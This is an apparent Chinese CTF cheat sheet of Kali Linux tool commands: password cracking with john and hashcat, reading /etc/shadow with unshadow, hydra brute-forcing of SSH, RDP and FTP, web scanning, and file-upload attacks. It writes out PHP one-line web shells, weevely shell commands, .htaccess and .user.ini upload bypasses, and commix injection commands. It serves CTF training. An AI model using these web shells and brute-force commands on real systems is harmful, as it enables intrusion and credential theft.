ctf之kali linux一些工具的使用

杂项MISC

unshadow命令

基本上会结合/etc/passwd的数据和/etc/shadow的数据,创建1个含有用户名和密码详细信息的文件。

unshadown /etc/passwd /etc/shadow > 1.txt

加解密插件

Base64的使用

1.base64 <file> -----------base64加密

2.base -d -i <file>--------- base64解密 -i去除无用字符

密码爆破

Crunch

4.crunch 4 4 0123456789 > <file>-------- 生成一个最小长度为4和最大长度为4的0~9的四位数密码本

Hashcat

hashcat -a 0 "md5值" –force

john

john 是一款大受欢迎的、免费的开源软件、基于字典的密码破解工具。

上图是John爆破hash

John <file>

  1. 破解的用户密码稍微高级一些,比如根据用户名来设置密码,我们就需要John -Single 这个命令,原理是根据用户的名称,加上常见的变化而猜测密码。比如此用户叫test,而他的密码是test123test1tsettest123...

John passwd.txt -single

  1. 当用户的密码设置的十分困难时,我们就需要一个字典文件来进行破解,这时我们可以使用John -w –rules :使用字典文件来进行解密,如人们常用hello、admin、password、superman、cooler、asdfgh、 123456等作为自己的密码。而-rules参数则在此基础上再加上些变化,如字典中有单词test,则john还会尝试使用tes、teSt、 tset等单词变化进行解密。

John -w:b.txt passwd.txt -rules

rar2john

rar2john 1.rar ----获取1.rar的md5值,之后配合hashcat使用。

zip2john

使用John破解zip文件

zip2john flag.zip >> password.txt 用zip2john爆破flag.zip的hash文件

john password.txt 使用John命令,计算hash文件
 

zip2john 1.zip ----获取1.zip的md5值,之后配合hashcat使用。

7z2john

7z2john 1.7z ----获取7z的md5值,之后配合hashcat使用。

Binwalk

binwalk -e <file>------------ 分离文件

Exiftool

exiftool <file> ---------查看exif类型文件详细信息

Hydra的使用

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 rdp----远程桌面爆破

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ssh ----ssh协议爆破

Hydra -L username.txt -P password.txt -t 2 -vV -e ns 192.168.126.176 ftp ----ftp协议爆破

扫描插件

注意:在kali中有默认的密码本,在/usr/share/wordlists目录下。

1.dirb使用

1.使用/usr/share/wordlists/dirb/big.txt 字典来扫描Web服务

dirb https://www.baidu.com  /usr/share/wordlists/dirb/big.txt -----dirb接url再接密码本的绝对路径

dirb <url> <file>

  1. 将扫描结果保存到文件中

dirb https://www.baidu.com/ -o output.txt /usr/share/wordlists/dirb/big.txt

  1. 列举指定后缀名目录

dirb https://www.baidu.com -X .php  /usr/share/wordlists/dirb/big.txt

  1. 添加毫秒延迟,避免洪水攻击

dirb http://www.baidu.com/ -z 100

2.whatweb使用

1.whatweb <url> --------扫描网站

2.whatweb 192.168.126.0/24-------扫描网段

3.whatweb <url> -c='<cookie>'------指定cookie

3.wpscan的使用

WPScan是Kali Linux默认自带的一款漏洞扫描工具,它采用Ruby编写,能够扫描WordPress网站中的多种安全漏洞,其中包括主题漏洞、插件漏洞和WordPress本身的漏洞。最新版本WPScan的数据库中包含超过18000种插件漏洞和2600种主题漏洞,并且支持最新版本的WordPress。值得注意的是,它不仅能够扫描类似robots.txt这样的敏感文件,而且还能够检测当前已启用的插件和其他功能。

wpscan --url "https://**********"

文件上传

weevely使用

<?php @eval($_GET['cmd']);?>

<?php @eval($_POST['cmd']);?>

<?php system($_GET['ls']);?>

创建一句话木马。

命令:weevely generate cmd /root/m.php

cmd是密码

/root/m.php是路径

连接weevely木马。(上传完后操作)

命令:weevely http://172.16.1.105/hackable/uploads/m.php cmd

http://172.16.1.105/hackable/upload/m.php是该木马文件在对方靶机里的路径

cmd 是密码,连接时一定要加上密码,千万不能忘记,否则会出问题。

出现weevely> 即为木马连接成功。

.htaccess

.htaccess ⽂件定义了 Apache 的解析规则,若存在以下⽂件,其内容会被 PHP script 解析

1 AddType  application/x-httpd-php .png

2 AddType  application/x-httpd-php .jpg

3 AddType  application/x-httpd-php .html

4 AddType  application/x-httpd-php .txt

5 ...

.user.ini

  1. auto_prepend_file = test.png  --------红色部分就是你上传的木马文件名

一句话木马

注:最好会php语言,不会就死记硬背

<?php @eval($_GET[‘cmd’]);?>

<?php @eval($_POST[‘cmd’]);?>

<?php system($_GET[‘ls’]);?>

<?php system($POST[ls]);?>

图片马

以管理员权限打开Windows命令行,切换到桌面目录

Copy 666.png/b + cmd.txt/a 888.png 就会复制一个新的888.png文件

数据库攻击

命令 / 代码注⼊ - commix

commix ⼯具遵循了 SQLmap 的命令格式,使⽤起来也⽐较⽅便

Get

commix -r https://www.example.com/index.php?code=1 --level 3-----红色部分表示url,绿色部分表示注入点。

POST

commix -r /home/leadlife/test/codeinj.txt  --level 3 –-----红色部分表示post信息保存的文件的绝对路径。

爬取可控参数并⾃动测试代码 / 命令注⼊

commix -u http://10.1.128/pikachu/ --crawl 3 --level 3

提权攻击

Find提权

Getcap提权

Which提权

 

Vmdk文件解压

Linux中

7z x flag.vmdk -o./

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值